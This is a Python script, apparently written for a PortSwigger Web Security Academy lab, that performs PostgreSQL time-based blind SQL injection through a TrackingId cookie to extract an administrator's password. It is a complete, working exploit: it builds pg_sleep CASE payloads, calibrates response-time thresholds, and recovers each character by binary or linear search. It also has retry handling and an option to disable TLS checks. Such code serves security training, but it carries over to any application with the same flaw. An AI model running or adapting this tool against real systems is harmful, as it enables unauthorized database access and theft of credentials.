1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
|
#!/usr/bin/env python3
"""PostgreSQL time-based blind SQL injection extractor.
Title: sqli-blind (hardened)
Author: Amit Agarwal
Date: 2026-06-15
Python: 3.13
Purpose: Extract an administrator password from a PortSwigger Web Security
Academy lab via PostgreSQL pg_sleep time-based blind SQLi injected
through the TrackingId cookie.
Assumptions:
- Target is an authorized lab/test environment (offensive use must be lawful).
- Vulnerable parameter is the TrackingId cookie; backend is PostgreSQL.
- The 'users' table has 'username' and 'password' columns.
- Default charset spans printable ASCII (codes 32-126).
- Password length is supplied or defaulted; extraction stops on no-match.
Usage:
python sqli-blind.py https://TARGET.web-security-academy.net/ \
--session "SESSION_COOKIE" --length 20
# Custom delay + linear fallback if timing is noisy:
python sqli-blind.py https://TARGET.web-security-academy.net/ \
--session "SESSION_COOKIE" --length 20 --delay 3 --method linear
Ruff guidance:
[tool.ruff] line-length = 100, target-version = "py313"
[tool.ruff.lint] select = ["E","F","I","B","UP","ANN","S","D"]; ignore = ["S113"]
Bandit guidance:
bandit sqli-blind.py
- SQL payloads are intentional for an authorized lab.
- TLS verification is on by default; --insecure is opt-in for proxy/Burp use.
"""
from __future__ import annotations
import argparse
import logging
import statistics
import string
import sys
import time
from dataclasses import dataclass
from pathlib import Path
from typing import Final
from urllib.parse import quote, urlparse
import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
LOGGER: Final = logging.getLogger("sqli_blind")
DEFAULT_USERNAME: Final[str] = "administrator"
DEFAULT_TRACKING_ID: Final[str] = "x"
DEFAULT_DELAY: Final[float] = 5.0
DEFAULT_LENGTH: Final[int] = 20
DEFAULT_CHARSET: Final[str] = string.ascii_letters + string.digits + string.punctuation
DEFAULT_RETRIES: Final[int] = 3
DEFAULT_BACKOFF: Final[float] = 0.5
CONNECT_TIMEOUT: Final[float] = 5.0
THRESHOLD_RATIO: Final[float] = 0.6 # fraction of delay above baseline = "delayed"
CALIBRATION_SAMPLES: Final[int] = 3
MIN_ASCII: Final[int] = 32
MAX_ASCII: Final[int] = 126
RETRY_STATUS: Final[tuple[int, ...]] = (429, 500, 502, 503, 504)
@dataclass(frozen=True)
class Config:
"""Validated runtime configuration."""
url: str
session_cookie: str
tracking_id: str
username: str
length: int
charset: str
method: str
delay: float
verify_tls: bool
def validate_url(value: str) -> str:
"""Validate that the URL uses http(s) and has a host."""
parsed = urlparse(value)
if parsed.scheme not in {"http", "https"} or not parsed.netloc:
raise argparse.ArgumentTypeError("URL must be http(s) with a hostname")
return value
def positive_int(value: str) -> int:
"""Parse a positive integer CLI argument."""
parsed = int(value)
if not 1 <= parsed <= 512:
raise argparse.ArgumentTypeError("value must be in range 1..512")
return parsed
def positive_float(value: str) -> float:
"""Parse a bounded positive float CLI argument."""
parsed = float(value)
if not 0.5 <= parsed <= 60.0:
raise argparse.ArgumentTypeError("value must be in range 0.5..60.0")
return parsed
def safe_cookie(value: str) -> str:
"""Reject header-injection characters in cookie values."""
if not value or any(c in value for c in ("\r", "\n", ";")):
raise argparse.ArgumentTypeError("cookie value empty or unsafe")
return value
def parse_args() -> argparse.Namespace:
"""Parse and validate command-line arguments."""
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("url", type=validate_url, help="Target lab URL")
parser.add_argument("--session", required=True, type=safe_cookie, help="session cookie value")
parser.add_argument("--tracking-id", default=DEFAULT_TRACKING_ID, type=safe_cookie, help="base TrackingId")
parser.add_argument("--username", default=DEFAULT_USERNAME, help="username to target")
parser.add_argument("--length", default=DEFAULT_LENGTH, type=positive_int, help="max password length")
parser.add_argument("--charset", default=DEFAULT_CHARSET, help="candidate charset (linear mode)")
parser.add_argument("--method", choices=("binary", "linear"), default="binary", help="extraction method")
parser.add_argument("--delay", default=DEFAULT_DELAY, type=positive_float, help="pg_sleep delay (s)")
parser.add_argument("--insecure", action="store_true", help="disable TLS verification")
parser.add_argument("--debug", action="store_true", help="verbose logging")
return parser.parse_args()
def build_config(args: argparse.Namespace) -> Config:
"""Assemble a validated Config from parsed args."""
if args.insecure:
LOGGER.warning("TLS verification disabled via --insecure")
return Config(
url=args.url,
session_cookie=args.session,
tracking_id=args.tracking_id,
username=args.username,
length=args.length,
charset=args.charset,
method=args.method,
delay=args.delay,
verify_tls=not args.insecure,
)
def build_session() -> requests.Session:
"""Create a session with retry/backoff and connection pooling."""
retry = Retry(
total=DEFAULT_RETRIES,
backoff_factor=DEFAULT_BACKOFF,
status_forcelist=RETRY_STATUS,
allowed_methods=frozenset({"GET"}),
raise_on_status=False,
)
adapter = HTTPAdapter(max_retries=retry)
session = requests.Session()
session.mount("http://", adapter)
session.mount("https://", adapter)
session.headers["User-Agent"] = "sqli-blind/2.0"
return session
def sql_literal(value: str) -> str:
"""Return a PostgreSQL-safe single-quoted string literal."""
return "'" + value.replace("'", "''") + "'"
def build_payload(config: Config, position: int, operator: str, code: int) -> str:
"""Build the URL-encoded TrackingId injection payload for one test."""
user = sql_literal(config.username)
raw = (
f"{config.tracking_id}';SELECT CASE WHEN "
f"(username={user} AND ASCII(SUBSTRING(password,{position},1)){operator}{code}) "
f"THEN pg_sleep({config.delay:.3f}) ELSE pg_sleep(0) END FROM users--"
)
return quote(raw, safe="")
def request_elapsed(session: requests.Session, config: Config, tracking_value: str) -> float | None:
"""Send one request and return elapsed wall-clock seconds, or None on failure."""
cookies = {"TrackingId": tracking_value, "session": config.session_cookie}
timeout = (CONNECT_TIMEOUT, config.delay + 5.0)
start = time.perf_counter()
try:
session.get(config.url, cookies=cookies, timeout=timeout, verify=config.verify_tls)
except requests.exceptions.ReadTimeout:
# A read timeout above the delay strongly implies the sleep fired.
return time.perf_counter() - start
except requests.RequestException as exc:
LOGGER.warning("request failed: %s", exc)
return None
return time.perf_counter() - start
def calibrate_threshold(session: requests.Session, config: Config) -> float:
"""Measure baseline latency and derive a timing threshold."""
baseline_value = quote(config.tracking_id, safe="")
samples = [
elapsed
for _ in range(CALIBRATION_SAMPLES + 2)
if (elapsed := request_elapsed(session, config, baseline_value)) is not None
][:CALIBRATION_SAMPLES]
if len(samples) < 2:
raise RuntimeError("insufficient baseline samples to calibrate threshold")
baseline = statistics.median(samples)
threshold = baseline + config.delay * THRESHOLD_RATIO
LOGGER.info("baseline median=%.3fs -> delay threshold=%.3fs", baseline, threshold)
return threshold
def is_delayed(session: requests.Session, config: Config, position: int,
operator: str, code: int, threshold: float) -> bool:
"""Return whether a SQL condition triggered a measurable delay."""
payload = build_payload(config, position, operator, code)
elapsed = request_elapsed(session, config, payload)
if elapsed is None:
return False
LOGGER.debug("pos=%d %s%d elapsed=%.3fs", position, operator, code, elapsed)
return elapsed >= threshold
def find_char_binary(session: requests.Session, config: Config, position: int,
threshold: float) -> str | None:
"""Recover one character via binary search over ASCII codes (O(log n))."""
low, high = MIN_ASCII, MAX_ASCII
while low < high:
mid = (low + high) // 2
if is_delayed(session, config, position, ">", mid, threshold):
low = mid + 1
else:
high = mid
if is_delayed(session, config, position, "=", low, threshold):
return chr(low)
return None
def find_char_linear(session: requests.Session, config: Config, position: int,
threshold: float) -> str | None:
"""Recover one character via linear charset scan (robust if timing is noisy)."""
for candidate in config.charset:
if is_delayed(session, config, position, "=", ord(candidate), threshold):
return candidate
return None
def recover_password(session: requests.Session, config: Config, threshold: float) -> str:
"""Recover characters until length is reached or no match is found."""
finder = find_char_binary if config.method == "binary" else find_char_linear
recovered: list[str] = []
for position in range(1, config.length + 1):
char = finder(session, config, position, threshold)
if char is None:
LOGGER.info("no match at position %d; assuming end of string", position)
break
recovered.append(char)
LOGGER.info("position %d/%d recovered", position, config.length)
return "".join(recovered)
def main() -> int:
"""Entry point: parse args, calibrate, extract, and report."""
args = parse_args()
logging.basicConfig(
level=logging.DEBUG if args.debug else logging.INFO,
format="%(asctime)s %(levelname)s %(name)s: %(message)s",
datefmt="%H:%M:%S",
)
try:
config = build_config(args)
session = build_session()
threshold = calibrate_threshold(session, config)
password = recover_password(session, config, threshold)
except (RuntimeError, ValueError, requests.RequestException) as exc:
LOGGER.error("extraction failed: %s", exc)
return 1
if password:
LOGGER.info("recovered password: %s", password)
return 0
LOGGER.warning("no characters recovered; check params, charset, or timing")
return 1
if __name__ == "__main__":
sys.exit(main())
|